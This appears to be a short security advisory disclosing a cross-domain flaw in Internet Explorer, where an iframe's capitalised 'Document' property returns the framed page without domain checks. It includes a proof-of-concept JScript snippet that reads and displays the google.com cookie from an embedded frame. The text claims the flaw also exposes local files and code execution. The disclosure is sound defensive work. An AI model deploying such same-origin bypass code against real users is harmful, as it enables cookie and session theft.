The <iframe> and <frame> elements are really instances of the WebBrowser control supplied by Microsoft. The WebBrowser control exposes several potentially dangerous properties by default, which Microsoft overrides in Internet Explorer.
However, Microsoft missed out on one important property -- "Document", with a capital "D".
This exploit demonstrates how an attacker may choose to read the client's "google.com" cookie.
<script language="jscript">
onload=function () {
// Timer necessary to prevent weird behavior in some conditions
setTimeout(
function () {
alert(document.getElementById("oVictim").Document.cookie);
},
100
);
}
</script>
<iframe src="http://google.com" id="oVictim"></iframe>
Normally, using "oElement.document" would provide a reference to the document that owns the current element. The same applies to the <frame> and <iframe> elements. However, we discovered that when "oIFrameElement.Document" is used, the returned document is the one contained inside the frame, and there are no security restrictions in place to check if it's in a different domain.
This provides free and full access to the frame's Document Object Model, which allows an attacker to steal cookies from any site,
gain access to content in sites (forging content), read local files and execute arbitrary programs on the client's machine (script
in the "My Computer" zone).
My Security workshop
Read More
008504#